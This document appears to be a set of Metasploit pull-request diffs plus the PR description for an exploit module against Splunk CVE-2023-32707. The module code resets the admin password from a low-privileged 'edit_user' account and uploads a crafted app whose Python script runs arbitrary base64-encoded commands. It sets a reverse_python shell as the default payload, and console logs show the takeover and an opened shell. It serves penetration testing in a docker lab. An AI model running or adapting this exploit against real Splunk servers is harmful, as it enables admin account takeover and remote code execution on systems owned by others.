+  include Msf::Exploit::Remote::HttpClient
+
+  attr_accessor :cookie
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Splunk "edit_user" Capability Privilege Escalation',
+        'Description' => %q{
+          A low-privileged user who holds a role that has the "edit_user" capability assigned to it
+          can escalate their privileges to that of the admin user by providing a specially crafted web request.
+          This is because the "edit_user" capability does not honor the "grantableRoles" setting in the authorize.conf
+          configuration file, which prevents this scenario from happening.
+
+          This exploit abuse this vulnerability to change the admin password and login with it to upload a malicious app achieving RCE.
+        },
+        'Author' => [
+          'Mr Hack (try_to_hack) Santiago Lopez', # discovery
+          'Heyder Andrade', # metasploit module
+          'Redway Security <redwaysecurity.com>' # Writeup and PoC
+        ],
+        'License' => MSF_LICENSE,
+        'References' => [
+          [ 'CVE', '2023-32707' ],
+          [ 'URL', 'https://advisory.splunk.com/advisories/SVD-2023-0602' ], # Vendor Advisory
+          [ 'URL', 'https://blog.redwaysecurity.com/2023/09/exploit-cve-2023-32707.html' ], # Writeup
+          [ 'URL', 'https://github.com/redwaysecurity/CVEs/tree/main/CVE-2023-32707' ] # PoC
+        ],
+        'Payload' => {
+          'Space' => 1024,
+          'DisableNops' => true
+        },
+        'Platform' => %w[linux unix win osx],
+        'Targets' => [
+          [
+            'Splunk < 9.0.5, 8.2.11, and 8.1.14 / Linux',
+            {
+              'Arch' => ARCH_CMD,
+              'Platform' => %w[linux unix],
+              'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_python' }
+            }
+          ],
+          [
+            'Splunk < 9.0.5, 8.2.11, and 8.1.14 / Windows',
+            {
+              'Arch' => ARCH_CMD,
+              'Platform' => 'win',
+              'DefaultOptions' => { 'PAYLOAD' => 'cmd/windows/adduser' }
+            }
+          ]
+        ],
+        'DefaultTarget' => 0,
+        'DefaultOptions' => {
+          'RPORT' => 8000,
+          'SSL' => true
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [
+            IOC_IN_LOGS,
+            ARTIFACTS_ON_DISK # app is uploaded
+          ]
+        },
+        'DisclosureDate' => '2023-06-01'
+      )
+    )
+
+    register_options(
+      [
+        OptString.new('USERNAME', [true, 'The username with "edit_user" role to authenticate as']),
+        OptString.new('PASSWORD', [true, 'The password for the specified username']),
+        OptString.new('TARGET_USER', [true, 'The username to change the password for (default: admin)', 'admin']),
+        OptString.new('TARGET_PASSWORD', [false, 'The new password to set for the admin user (default: random)']),
+        OptString.new('APP_NAME', [false, 'The name of the app to upload (default: random)'])
+      ]
+    )
+
+    register_advanced_options(
+      [
+        OptBool.new('ReturnOutput', [ true, 'Display command output', false ]),
+        OptBool.new('DisableUpload', [ true, 'Disable the app upload if you have already performed it once', false ])
+      ]
+    )
+  end
+
+  def check
+    splunk_login(datastore['USERNAME'], datastore['PASSWORD'])
+
+    res = send_request_cgi({
+      'uri' => normalize_uri(target_uri.path, '/en-US/splunkd/__raw/services/authentication/users/', datastore['USERNAME']),
+      'method' => 'GET',
+      'cookie' => cookie,
+      'vars_get' => {
+        'output_mode' => 'json'
+      }
+    })
+
+    return CheckCode::Detected('Could not detect the version.') unless res&.code == 200
+
+    body = res.get_json_document
+    version = Rex::Version.new(body['generator']['version'])
+
+    return CheckCode::Safe("Detected Splunk version #{version} which is not vulnerable") unless (
+      version < Rex::Version.new('9.0.5') ||
+      version < Rex::Version.new('8.2.11') ||
+      version < Rex::Version.new('8.1.14')
+    )
+
+    print_status("Splunk version #{version} detected")
+    capabilities = body['entry'].first['content']['capabilities']
+
+    return CheckCode::Safe("User '#{datastore['USERNAME']}' does not have 'edit_user' capability") unless capabilities.include? 'edit_user'
+
+    report_vuln(
+      host: rhost,
+      name: name,
+      refs: references,
+      info: [version]
+    )
+
+    CheckCode::Appears("User '#{datastore['USERNAME']}' has 'edit_user' capability")
+  end
+
+  def app_name
+    @app_name ||= (datastore['APP_NAME'] || Faker::App.name).downcase.gsub(/\s/, '_')
+  end
+
+  def cleanup
+    return unless session_created?
+
+    super
+
+    execute_command("bash -c 'rm -rf $SPLUNK_HOME/etc/apps/#{app_name}'")
+    send_request_cgi({
+      'uri' => normalize_uri(target_uri.path, '/en-US/debug/refresh'),
+      'method' => 'POST',
+      'cookie' => cookie,
+      'vars_post' => {
+        'splunk_form_key' => cookies_hash['splunkweb_csrf_token_8000']
+      }
+    })
+  end
+
+  def exploit
+    @password = datastore['TARGET_PASSWORD'] || Rex::Text.rand_text_alpha(rand(8..12))
+
+    splunk_change_password(datastore['TARGET_USER'], @password)
+    splunk_login(datastore['TARGET_USER'], @password)
+
+    splunk_upload_app(app_name, datastore['SPLUNK_APP_FILE']) unless datastore['DisableUpload']
+
+    job_id = execute_command(payload.encoded, { app_name: app_name })
+    if datastore['ReturnOutput']
+      print_status('Waiting for command output')
+      print_line(spunk_fetch_job_output(app_name, job_id))
+    else
+      print_status('Waiting for session')
+      handler
+    end
+  end
+
+  def execute_command(cmd, opts = {})
+    # cookies_hash = cookie.split(';').each_with_object({}) { |name, h| h[name.split('=').first.strip] = name.split('=').last.strip }
+
+    res = send_request_cgi({
+      'uri' => '/en-US/api/search/jobs',
+      'method' => 'POST',
+      'cookie' => cookie, # it assumes that the cookie is already set
+      'headers' =>
+        {
+          'X-Requested-With' => 'XMLHttpRequest',
+          'X-Splunk-Form-Key' => cookies_hash['splunkweb_csrf_token_8000']
+        },
+      'vars_post' =>
+        {
+          'auto_cancel' => '62',
+          'status_buckets' => '300',
+          'output_mode' => 'json',
+          # 'search' => "search * | script msf_exec #{Rex::Text.encode_base64(cmd)}",
+          'search' => "|  #{app_name} #{Rex::Text.encode_base64(cmd)}",
+          'earliest_time' => '-24h@h',
+          'latest_time' => 'now',
+          'ui_dispatch_app' => (opts[:app_name]).to_s
+        }
+    })
+
+    fail_with(Failure::UnexpectedReply, "Unable to execute command. Unexpected reply (HTTP #{res.code})") unless res&.code == 200
+
+    body = res.get_json_document
+
+    fail_with(Failure::UnexpectedReply, "Unable to execute command. Unexpected reply (HTTP #{res.code})") unless body['data']
+
+    body['data']
+  end
+
+  def splunk_helper_extract_token(uri)
+    res = send_request_cgi({
+      'uri' => normalize_uri(target_uri.path, uri),
+      'method' => 'GET',
+      'keep_cookies' => true
+    })
+
+    fail_with(Failure::Unreachable, 'Unable to get token') unless res&.code == 200
+
+    "session_id_8000=#{rand_text_numeric(40)}; " << res.get_cookies
+  end
+
+  def splunk_login(username, password)
+    # gets cval and splunkweb_uid cookies
+    self.cookie = splunk_helper_extract_token('/en-US/account/login')
+
+    # cookies_hash = cookie.split(';').each_with_object({}) { |name, h| h[name.split('=').first.strip] = name.split('=').last.strip }
+
+    # login post, should get back the splunkd_8000 and splunkweb_csrf_token_8000 cookies
+    res = send_request_cgi({
+      'uri' => normalize_uri(target_uri.path, '/en-US/account/login'),
+      'method' => 'POST',
+      'cookie' => cookie,
+      'vars_post' =>
+        {
+          'username' => username,
+          'password' => password,
+          'cval' => cookies_hash['cval']
+        }
+    })
+
+    fail_with(Failure::UnexpectedReply, 'Unable to login') unless res&.code == 200
+
+    cookie << " #{res.get_cookies}"
+
+    # get session_id_8000 cookie
+
+    # self.cookie_hash = cookie.split(';').each_with_object({ }) { |name, h| h[name.split('=').first] = name.split('=').last }
+  end
+
+  def splunk_change_password(username, password)
+    # due to the AutoCheck mixin and the keep_cookies option, the cookie might be already set
+    do_login(username, password) unless cookie
+
+    print_status("Changing '#{username}' password to #{password}")
+    res = send_request_cgi({
+      'uri' => normalize_uri('/en-US/splunkd/__raw/services/authentication/users/', username),
+      'method' => 'POST',
+      'headers' => {
+        'X-Splunk-Form-Key' => cookies_hash['splunkweb_csrf_token_8000'],
+        'X-Requested-With' => 'XMLHttpRequest'
+      },
+      'cookie' => cookie,
+      'vars_post' => {
+        'output_mode' => 'json',
+        'password' => password,
+        'force-change-pass' => 0,
+        'locked-out' => 0
+      }
+    })
+
+    fail_with(Failure::UnexpectedReply, "Unable to change #{username}'s password.") unless res&.code == 200
+
+    print_good("Password of the user '#{username}' has bee changed to #{password}")
+
+    body = res.get_json_document
+    capabilities = body['entry'].first['content']['capabilities']
+
+    fail_with(Failure::BadConfig, "The user '#{username}' does not have 'install_app' capability. You may consider to target other user") unless capabilities.include? 'install_apps'
+  end
+
+  def splunk_upload_app(app_name, _file_name)
+    res = send_request_cgi({
+      'uri' => normalize_uri(target_uri.path, '/en-US/manager/appinstall/_upload'),
+      'method' => 'GET',
+      'cookie' => cookie
+    })
+
+    fail_with(Failure::UnexpectedReply, 'Unable to get form state') unless res&.code == 200
+
+    html = res.get_html_document
+
+    print_status("Uploading file #{app_name}")
+
+    boundary = '-' * 29 + rand_text_numeric(30)
+    data = ''
+    # fill the hidden fields from the form: state and splunk_form_key
+    html.at('[id="installform"]').elements.each do |form|
+      next unless form.attributes['value']
+
+      data << "\r\n--#{boundary}\r\n"
+      data << "Content-Disposition: form-data; name=\"#{form.attributes['name']}\"\r\n\r\n"
+      data << form.attributes['value'].to_s
+      data << "\r\n--#{boundary}\r\n"
+    end
+
+    data << "Content-Disposition: form-data; name=\"force\"\r\n\r\n"
+    data << '1'
+    data << "\r\n--#{boundary}\r\n"
+
+    data << "Content-Disposition: form-data; name=\"appfile\"; filename=\"#{app_name}.tar.gz\"\r\n"
+    data << "Content-Type: application/gzip\r\n\r\n"
+    data << splunk_app
+    data << "\r\n--#{boundary}--\r\n"
+
+    res = send_request_cgi({
+      'uri' => '/en-US/manager/appinstall/_upload',
+      'method' => 'POST',
+      'cookie' => cookie,
+      'ctype' => "multipart/form-data; boundary=#{boundary}",
+      'data' => data
+    })
+
+    if (res&.code == 303 || (res.code == 200 && res.body !~ /There was an error processing the upload/))
+      print_good("#{app_name} successfully uploaded")
+    else
+      fail_with(Failure::Unknown, 'Error uploading App')
+    end
+  end
+
+  def spunk_fetch_job_output(app_name, job_id)
+    # http get to  /en-US/splunkd/__raw/servicesNS/redway/upload_app_exec/search/jobs/1693414901.69/results
+
+    res = send_request_cgi({
+      'uri' => normalize_uri(target_uri.path, "/en-US/splunkd/__raw/servicesNS/#{datastore['TARGET_USER']}/#{app_name}/search/jobs/#{job_id}/results"),
+      'method' => 'GET',
+      'keep_cookies' => true,
+      'cookie' => cookie,
+      'vars_get' => {
+        'output_mode' => 'json'
+      }
+    })
+
+    fail_with(Failure::UnexpectedReply, "Unable to get JOB results. Unexpected reply (HTTP #{res.code})") unless res&.code == 200
+
+    body = res.get_json_document
+
+    fail_with(Failure::UnexpectedReply, "Splunk reply: #{body['messages'].collect { |h| h['text'] if h['type'] == 'ERROR' }.join('\n')}") if body['results'].empty?
+
+    Rex::Text.decode_base64(body['results'].first['result'])
+  end
+
+  def splunk_app
+    # app_name = 'test_app_exec'
+    # print_status("Creating an application package named: #{app_name}")
+    # script_name = "#{Rex::Text.rand_text_alpha_lower(3..8)}.sh"
+
+    # metadata folder
+    metadata = <<~EOF
+      [commands]
+      export = system
+    EOF
+
+    # default folder
+    commands_conf = <<~EOF
+      [#{app_name}]
+      type = python
+      filename = #{app_name}.py
+      local = false
+      enableheader = false
+      streaming = false
+      perf_warn_limit = 0
+    EOF
+
+    app_conf = <<~EOF
+      [launcher]
+      author=#{Faker::Name.name}
+      description=#{Faker::Lorem.sentence}
+      version=#{Faker::App.version}
+
+      [ui]
+      is_visible = false
+    EOF
+
+    # bin folder
+    msf_exec_py = <<~EOF
+      import sys
+      import base64
+      import splunk.Intersplunk
+
+      header = ["result"]
+
+      results = []
+      value_bytes = base64.b64decode(sys.argv[1])
+      try:
+          value_str = value_bytes.decode('utf-8')
+          output = sys.modules['os'].popen(value_str).read()
+          output_base64 = base64.b64encode(output.encode('utf-8')).decode('utf-8')
+          results.append({"result": output_base64})
+
+      except Exception as e:
+          error_msg = "Error : " + str(e)
+          results = splunk.Intersplunk.generateErrorResults(error_msg)
+
+      splunk.Intersplunk.outputResults(results, fields=header)
+    EOF
+
+    tarfile = StringIO.new
+    Rex::Tar::Writer.new tarfile do |tar|
+      tar.add_file("#{app_name}/metadata/default.meta", 0o644) do |io|
+        io.write metadata
+      end
+      tar.add_file("#{app_name}/default/commands.conf", 0o644) do |io|
+        io.write commands_conf
+      end
+      tar.add_file("#{app_name}/default/app.conf", 0o644) do |io|
+        io.write app_conf
+      end
+      tar.add_file("#{app_name}/bin/#{app_name}.py", 0o644) do |io|
+        io.write msf_exec_py
+      end
+    end
+    tarfile.rewind
+    tarfile.close
+
+    Rex::Text.gzip(tarfile.string)
+  end
+
+  def cookies_hash
+    cookie.split(';').each_with_object({}) { |name, h| h[name.split('=').first.strip] = name.split('=').last.strip }
+  end
+
+end

--- a/modules/exploits/multi/http/splunk_privilege_escalation_cve_2023_32707.rb
+++ b/modules/exploits/multi/http/splunk_privilege_escalation_cve_2023_32707.rb
@@ -23,7 +23,7 @@ class MetasploitModule < Msf::Exploit::Remote
           This is because the "edit_user" capability does not honor the "grantableRoles" setting in the authorize.conf
           configuration file, which prevents this scenario from happening.
 
-          This exploit abuse this vulnerability to change the admin password and login with it to upload a malicious app achieving RCE.
+          This exploit abuses this vulnerability to change the admin password and login with it to upload a malicious app achieving RCE.
         },
         'Author' => [
           'Mr Hack (try_to_hack) Santiago Lopez', # discovery

--- a/modules/exploits/multi/http/splunk_privilege_escalation_cve_2023_32707.rb
+++ b/modules/exploits/multi/http/splunk_privilege_escalation_cve_2023_32707.rb
@@ -167,8 +167,6 @@ class MetasploitModule < Msf::Exploit::Remote
       print_status('Waiting for command output')
       print_line(spunk_fetch_job_output(app_name, job_id))
     else
-      print_status('Waiting for session')
-      handler
     end
   end
 
@@ -317,7 +315,7 @@ class MetasploitModule < Msf::Exploit::Remote
     end
   end
 
-  def spunk_fetch_job_output(app_name, job_id)
+  def splunk_fetch_job_output(app_name, job_id)
     res = send_request_cgi({
       'uri' => normalize_uri(target_uri.path, "/en-US/splunkd/__raw/servicesNS/#{datastore['TARGET_USER']}/#{app_name}/search/jobs/#{job_id}/results"),
       'method' => 'GET',

--- a/modules/exploits/multi/http/splunk_privilege_escalation_cve_2023_32707.rb
+++ b/modules/exploits/multi/http/splunk_privilege_escalation_cve_2023_32707.rb
@@ -137,21 +137,22 @@ class MetasploitModule < Msf::Exploit::Remote
     @app_name ||= (datastore['APP_NAME'] || Faker::App.name).downcase.gsub(/\s/, '_')
   end
 
-  def cleanup
-    return unless session_created?
+  # The cleanup method is removing the app before the session is closed and it is broking the session.
+  # def cleanup
+  #   return unless session_created?
 
-    super
+  #   super
 
-    execute_command("bash -c 'rm -rf $SPLUNK_HOME/etc/apps/#{app_name}'")
-    send_request_cgi({
-      'uri' => normalize_uri(target_uri.path, '/en-US/debug/refresh'),
-      'method' => 'POST',
-      'cookie' => cookie,
-      'vars_post' => {
-        'splunk_form_key' => cookies_hash['splunkweb_csrf_token_8000']
-      }
-    })
-  end
+  #   execute_command("bash -c 'rm -rf $SPLUNK_HOME/etc/apps/#{app_name}'")
+  #   send_request_cgi({
+  #     'uri' => normalize_uri(target_uri.path, '/en-US/debug/refresh'),
+  #     'method' => 'POST',
+  #     'cookie' => cookie,
+  #     'vars_post' => {
+  #       'splunk_form_key' => cookies_hash['splunkweb_csrf_token_8000']
+  #     }
+  #   })
+  # end
 
   def exploit
     @password = datastore['TARGET_PASSWORD'] || Rex::Text.rand_text_alpha(rand(8..12))
@@ -172,12 +173,10 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def execute_command(cmd, opts = {})
-    # cookies_hash = cookie.split(';').each_with_object({}) { |name, h| h[name.split('=').first.strip] = name.split('=').last.strip }
-
     res = send_request_cgi({
       'uri' => '/en-US/api/search/jobs',
       'method' => 'POST',
-      'cookie' => cookie, # it assumes that the cookie is already set
+      'cookie' => cookie,
       'headers' =>
         {
           'X-Requested-With' => 'XMLHttpRequest',
@@ -188,7 +187,6 @@ class MetasploitModule < Msf::Exploit::Remote
           'auto_cancel' => '62',
           'status_buckets' => '300',
           'output_mode' => 'json',
-          # 'search' => "search * | script msf_exec #{Rex::Text.encode_base64(cmd)}",
           'search' => "|  #{app_name} #{Rex::Text.encode_base64(cmd)}",
           'earliest_time' => '-24h@h',
           'latest_time' => 'now',
@@ -221,8 +219,6 @@ class MetasploitModule < Msf::Exploit::Remote
     # gets cval and splunkweb_uid cookies
     self.cookie = splunk_helper_extract_token('/en-US/account/login')
 
-    # cookies_hash = cookie.split(';').each_with_object({}) { |name, h| h[name.split('=').first.strip] = name.split('=').last.strip }
-
     # login post, should get back the splunkd_8000 and splunkweb_csrf_token_8000 cookies
     res = send_request_cgi({
       'uri' => normalize_uri(target_uri.path, '/en-US/account/login'),
@@ -239,10 +235,6 @@ class MetasploitModule < Msf::Exploit::Remote
     fail_with(Failure::UnexpectedReply, 'Unable to login') unless res&.code == 200
 
     cookie << " #{res.get_cookies}"
-
-    # get session_id_8000 cookie
-
-    # self.cookie_hash = cookie.split(';').each_with_object({ }) { |name, h| h[name.split('=').first] = name.split('=').last }
   end
 
   def splunk_change_password(username, password)
@@ -326,8 +318,6 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def spunk_fetch_job_output(app_name, job_id)
-    # http get to  /en-US/splunkd/__raw/servicesNS/redway/upload_app_exec/search/jobs/1693414901.69/results
-
     res = send_request_cgi({
       'uri' => normalize_uri(target_uri.path, "/en-US/splunkd/__raw/servicesNS/#{datastore['TARGET_USER']}/#{app_name}/search/jobs/#{job_id}/results"),
       'method' => 'GET',
@@ -348,10 +338,6 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def splunk_app
-    # app_name = 'test_app_exec'
-    # print_status("Creating an application package named: #{app_name}")
-    # script_name = "#{Rex::Text.rand_text_alpha_lower(3..8)}.sh"
-
     # metadata folder
     metadata = <<~EOF
       [commands]

--- a/modules/exploits/multi/http/splunk_privilege_escalation_cve_2023_32707.rb
+++ b/modules/exploits/multi/http/splunk_privilege_escalation_cve_2023_32707.rb
@@ -52,7 +52,7 @@ class MetasploitModule < Msf::Exploit::Remote
                 'PAYLOAD' => 'cmd/unix/reverse_python',
                 # just to avoid the error because of the clean up: 'error retrieving current directory: getcwd: cannot access parent directories:'
                 'AutoRunScript' => 'post/multi/general/execute COMMAND=cd $SPLUNK_HOME'
-               }
+              }
             }
           ],
           [
@@ -144,6 +144,7 @@ class MetasploitModule < Msf::Exploit::Remote
   #
   def cleanup
     return unless session_created?
+
     super
     # Destroy job
     vprint_status("Cleaning up: destroying job #{@job_id}")


### PR DESCRIPTION
This module exploits an authorization vulnerability in Splunk  (CVE-2023-32707), allowing a lower privileged user with the capability `edit_user` to take over the admin account and log in to upload a malicious app, achieving remote code execution.

Closes #18061 

### Vulnerable Application

Create a Splunk's docker container with the following command:

```bash
    docker run --rm -p 8000:8000 -p 8089:8089 -e "SPLUNK_START_ARGS=--accept-license" -e "SPLUNK_PASSWORD=password" --name splunk-9.0.4 splunk/splunk:9.0.4
```

```bash
    # Creating non-admin user
    $ curl -k -u admin:password https://localhost:8089/services/authentication/users -d name=redway -d password=changeme -d roles=user -d createrole=1 -X POST
    # Adding capability to edit_user to the non-admin role
    $ curl -k -u admin:password https://localhost:8089/services/authorization/roles/user-redway -d capabilities=edit_user -X POST
```


## Scenarios

### Docker container running Splunk 9.0.4

If the user you have access doen't have the capability `edit_user` the module will fail as shown below:
   ```
   msf6 exploit(multi/http/splunk_privilege_escalation_cve_2023_32707) > check
   [*] Splunk version 9.0.4 detected
   [*] 127.0.0.1:8000 - The target is not exploitable. User 'redway' does not have 'edit_user' capability
   msf6 exploit(multi/http/splunk_privilege_escalation_cve_2023_32707) >
   ```
If the targeted user does have the capability `install_apps` the module will fail as shown below:

```
msf6 exploit(multi/http/splunk_privilege_escalation_cve_2023_32707) > exploit
[*] Started reverse TCP handler on 172.17.0.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Splunk version 9.0.4 detected
[+] The target appears to be vulnerable. User 'redway' has 'edit_user' capability
[*] Changing 'user' password to yMDIOKyrHoUx
[+] Password of the user 'user' has bee changed to yMDIOKyrHoUx
[-] Exploit aborted due to failure: bad-config: The user 'user' does not have 'install_app' capability. You may consider to target other user
[*] Exploit completed, but no session was created.
msf6 exploit(multi/http/splunk_privilege_escalation_cve_2023_32707) >
```

In an exploitable scenario, it behaves as shown:

```
msf6 exploit(multi/http/splunk_privilege_escalation_cve_2023_32707) > options
Module options (exploit/multi/http/splunk_privilege_escalation_cve_2023_32707):
   Name             Current Setting      Required  Description
   ----             ---------------      --------  -----------
   APP_NAME                              no        The name of the app to upload (default: random)
   PASSWORD         changeme             yes       The password for the specified username
   Proxies          http:127.0.0.1:8080  no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS           127.0.0.1            yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT            8000                 yes       The target port (TCP)
   SSL              false                no        Negotiate SSL/TLS for outgoing connections
   TARGET_PASSWORD                       no        The new password to set for the admin user (default: random)
   TARGET_USER      admin                yes       The username to change the password for (default: admin)
   USERNAME         redway               yes       The username with "edit_user" role to authenticate as
   VHOST                                 no        HTTP server virtual host
Payload options (cmd/unix/reverse_python):
   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  172.17.0.1       yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port
   SHELL  /bin/sh          yes       The system shell to use
Exploit target:
   Id  Name
   --  ----
   0   Splunk <= 9.0.5, 8.2.11, and 8.1.14 / Linux
View the full module info with the info, or info -d command.
msf6 exploit(multi/http/splunk_privilege_escalation_cve_2023_32707) > exploit
[*] Started reverse TCP handler on 172.17.0.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Splunk version 9.0.4 detected
[+] The target appears to be vulnerable. User 'redway' has 'edit_user' capability
[*] Changing 'admin' password to srviInIpi
[+] Password of the user 'admin' has bee changed to srviInIpi
[*] Uploading app stringtough
[*] Uploading file stringtough
[*] Creating an application package named: stringtough
[+] stringtough successfully uploaded
[*] Waiting for session
[*] Command shell session 1 opened (172.17.0.1:4444 -> 172.17.0.2:52672) at 2023-09-12 15:19:53 +0200
id
uid=41812(splunk) gid=41812(splunk) groups=41812(splunk),999(ansible)
pwd
/opt/splunk/etc/apps/stringtough/bin
exit
[*] 127.0.0.1 - Command shell session 1 closed.
```


### Docker container running Splunk 9.0.5

On a **non-vulnerable** version the module will fail as shown below:

```
msf6 exploit(multi/http/splunk_privilege_escalation_cve_2023_32707) > exploit 
[*] Started reverse TCP handler on 172.17.0.1:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[!] The target is not exploitable. Detected Splunk version 9.0.5 which is not vulnerable ForceExploit is enabled, proceeding with exploitation.
[*] Changing 'admin' password to iDKBmVsj
[-] Exploit aborted due to failure: unexpected-reply: Unable to change admin's password.
[*] Exploit completed, but no session was created.
msf6 exploit(multi/http/splunk_privilege_escalation_cve_2023_32707) > set ForceExploit true
ForceExploit => true
msf6 exploit(multi/http/splunk_privilege_escalation_cve_2023_32707) > exploit 
[*] Started reverse TCP handler on 172.17.0.1:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[!] The target is not exploitable. Detected Splunk version 9.0.5 which is not vulnerable ForceExploit is enabled, proceeding with exploitation.
[*] Changing 'admin' password to scupUXtcV
[-] Exploit aborted due to failure: unexpected-reply: Unable to change admin's password.
[*] Exploit completed, but no session was created.
msf6 exploit(multi/http/splunk_privilege_escalation_cve_2023_32707) > 
```


